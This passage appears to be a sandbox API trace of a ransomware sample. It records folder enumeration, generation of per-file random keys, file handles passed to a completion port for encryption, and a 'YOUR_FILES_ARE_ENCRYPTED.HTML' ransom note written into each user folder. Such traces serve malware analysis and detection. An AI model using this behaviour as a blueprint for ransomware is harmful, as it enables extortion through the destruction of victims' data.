pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Saved Games\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 67 [0125.346] GetProcessHeap () returned 0x600000 [0125.346] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3155038 [0125.347] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Saved Games\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\saved games\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0125.347] WriteFile (in: hFile=0x314, lpBuffer=0x3155038*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x3155038*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0125.348] CloseHandle (hObject=0x314) returned 1 [0125.348] GetProcessHeap () returned 0x600000 [0125.348] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3155038 | out: hHeap=0x600000) returned 1 [0125.348] GetProcessHeap () returned 0x600000 [0125.348] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0125.349] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43695fb2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437a1142, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437a1142, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Searches", cAlternateFileName="")) returned 1 [0125.349] StrStrIW (lpFirst="Searches", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.349] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Searches") returned 34 [0125.349] GetProcessHeap () returned 0x600000 [0125.349] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0125.350] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Searches" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Searches") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Searches" [0125.350] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Searches", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Searches\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Searches\\*" [0125.350] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Searches\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43695fb2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437a1142, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437a1142, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0125.350] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43695fb2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437a1142, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437a1142, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0125.350] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x436bc315, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437a1142, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0125.350] StrStrIW (lpFirst="desktop.ini", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.350] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Searches\\desktop.ini") returned 46 [0125.350] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0125.350] lstrlenW (lpString=".ini") returned 4 [0125.350] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0125.350] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.350] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Searches\\desktop.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\searches\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.350] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=524) returned 1 [0125.351] GetProcessHeap () returned 0x600000 [0125.351] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.353] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="FB") returned 2 [0125.353] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="0C") returned 2 [0125.353] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="3D") returned 2 [0125.353] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="5B") returned 2 [0125.353] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="BF") returned 2 [0125.353] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="20") returned 2 [0125.353] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="83") returned 2 [0125.353] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="8E") returned 2 [0125.353] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="56") returned 2 [0125.353] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="3B") returned 2 [0125.353] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="A9") returned 2 [0125.353] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="96") returned 2 [0125.353] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="44") returned 2 [0125.353] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="EE") returned 2 [0125.353] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="2E") returned 2 [0125.353] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="32") returned 2 [0125.353] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="FF") returned 2 [0125.353] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="78") returned 2 [0125.353] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="51") returned 2 [0125.353] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="19") returned 2 [0125.353] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="51") returned 2 [0125.353] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="AF") returned 2 [0125.353] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="62") returned 2 [0125.353] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="CF") returned 2 [0125.353] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="8B") returned 2 [0125.353] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="48") returned 2 [0125.353] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="AA") returned 2 [0125.353] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="2A") returned 2 [0125.353] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="0D") returned 2 [0125.353] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="0A") returned 2 [0125.354] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="64") returned 2 [0125.354] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="47") returned 2 [0125.354] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Searches\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Searches\\desktop.ini") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Searches\\desktop.ini" [0125.354] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.354] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.355] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x437a1142, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437a1142, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437a1142, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0125.356] StrStrIW (lpFirst="Everywhere.search-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.356] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Searches\\Everywhere.search-ms") returned 55 [0125.356] PathFindExtensionW (pszPath="Everywhere.search-ms") returned=".search-ms" [0125.356] lstrlenW (lpString=".search-ms") returned 10 [0125.356] PathFindExtensionW (pszPath="Everywhere.search-ms") returned=".search-ms" [0125.357] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x4377acca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4377acca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4377acca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0125.357] StrStrIW (lpFirst="Indexed Locations.search-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.357] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Searches\\Indexed Locations.search-ms") returned 62 [0125.358] PathFindExtensionW (pszPath="Indexed Locations.search-ms") returned=".search-ms" [0125.358] lstrlenW (lpString=".search-ms") returned 10 [0125.358] PathFindExtensionW (pszPath="Indexed Locations.search-ms") returned=".search-ms" [0125.358] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x4377acca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4377acca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4377acca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0125.360] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0125.360] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Searches\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 64 [0125.360] GetProcessHeap () returned 0x600000 [0125.360] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3155038 [0125.360] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Searches\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\searches\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0125.361] WriteFile (in: hFile=0x314, lpBuffer=0x3155038*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x3155038*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0125.361] CloseHandle (hObject=0x314) returned 1 [0125.362] GetProcessHeap () returned 0x600000 [0125.362] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3155038 | out: hHeap=0x600000) returned 1 [0125.362] GetProcessHeap () returned 0x600000 [0125.362] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0125.362] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="SendTo", cAlternateFileName="")) returned 1 [0125.362] StrStrIW (lpFirst="SendTo", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.362] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\SendTo") returned 32 [0125.362] GetProcessHeap () returned 0x600000 [0125.362] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0125.362] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\SendTo" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\SendTo") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\SendTo" [0125.362] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\SendTo", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\SendTo\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\SendTo\\*" [0125.362] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\SendTo\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x4377acca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4377acca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4377acca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="Indexed Locations.search-ms", cAlternateFileName="翿")) returned 0xffffffff [0125.362] GetProcessHeap () returned 0x600000 [0125.362] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0125.362] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0125.362] StrStrIW (lpFirst="Start Menu", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.362] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Start Menu") returned 36 [0125.362] GetProcessHeap () returned 0x600000 [0125.362] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0125.362] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Start Menu" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Start Menu") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Start Menu" [0125.362] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Start Menu", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Start Menu\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Start Menu\\*" [0125.362] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Start Menu\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x4377acca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4377acca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4377acca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="Indexed Locations.search-ms", cAlternateFileName="翿")) returned 0xffffffff [0125.362] GetProcessHeap () returned 0x600000 [0125.362] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0125.362] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0125.363] StrStrIW (lpFirst="Templates", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.363] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Templates") returned 35 [0125.363] GetProcessHeap () returned 0x600000 [0125.363] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0125.363] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Templates" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Templates") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Templates" [0125.363] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Templates", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Templates\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Templates\\*" [0125.363] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Templates\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x4377acca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4377acca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4377acca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="Indexed Locations.search-ms", cAlternateFileName="翿")) returned 0xffffffff [0125.363] GetProcessHeap () returned 0x600000 [0125.363] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0125.363] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x528cdabb, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x528cdabb, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Videos", cAlternateFileName="")) returned 1 [0125.363] StrStrIW (lpFirst="Videos", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.363] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos") returned 32 [0125.363] GetProcessHeap () returned 0x600000 [0125.363] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0125.363] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos" [0125.363] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\*" [0125.363] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x528cdabb, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x528cdabb, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0125.363] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x528cdabb, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x528cdabb, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0125.363] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9417fbf0, ftCreationTime.dwHighDateTime=0x1d7005c, ftLastAccessTime.dwLowDateTime=0x46f85be0, ftLastAccessTime.dwHighDateTime=0x1d70344, ftLastWriteTime.dwLowDateTime=0x46f85be0, ftLastWriteTime.dwHighDateTime=0x1d70344, nFileSizeHigh=0x0, nFileSizeLow=0x155d8, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="5zDuRf.mkv", cAlternateFileName="")) returned 1 [0125.363] StrStrIW (lpFirst="5zDuRf.mkv", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.363] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\5zDuRf.mkv") returned 43 [0125.363] PathFindExtensionW (pszPath="5zDuRf.mkv") returned=".mkv" [0125.363] lstrlenW (lpString=".mkv") returned 4 [0125.363] PathFindExtensionW (pszPath="5zDuRf.mkv") returned=".mkv" [0125.363] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdfbf7a30, ftCreationTime.dwHighDateTime=0x1d6ff51, ftLastAccessTime.dwLowDateTime=0x39469020, ftLastAccessTime.dwHighDateTime=0x1d70948, ftLastWriteTime.dwLowDateTime=0x39469020, ftLastWriteTime.dwHighDateTime=0x1d70948, nFileSizeHigh=0x0, nFileSizeLow=0x17c72, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="6LuNV.mp4", cAlternateFileName="")) returned 1 [0125.363] StrStrIW (lpFirst="6LuNV.mp4", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.363] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\6LuNV.mp4") returned 42 [0125.363] PathFindExtensionW (pszPath="6LuNV.mp4") returned=".mp4" [0125.364] lstrlenW (lpString=".mp4") returned 4 [0125.364] PathFindExtensionW (pszPath="6LuNV.mp4") returned=".mp4" [0125.364] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.364] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\6LuNV.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\6lunv.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.364] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=97394) returned 1 [0125.364] GetProcessHeap () returned 0x600000 [0125.364] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.365] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="72") returned 2 [0125.365] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="C0") returned 2 [0125.365] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="AB") returned 2 [0125.365] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="E0") returned 2 [0125.365] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="40") returned 2 [0125.365] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="D2") returned 2 [0125.365] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="F8") returned 2 [0125.365] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="43") returned 2 [0125.365] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="9D") returned 2 [0125.365] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="09") returned 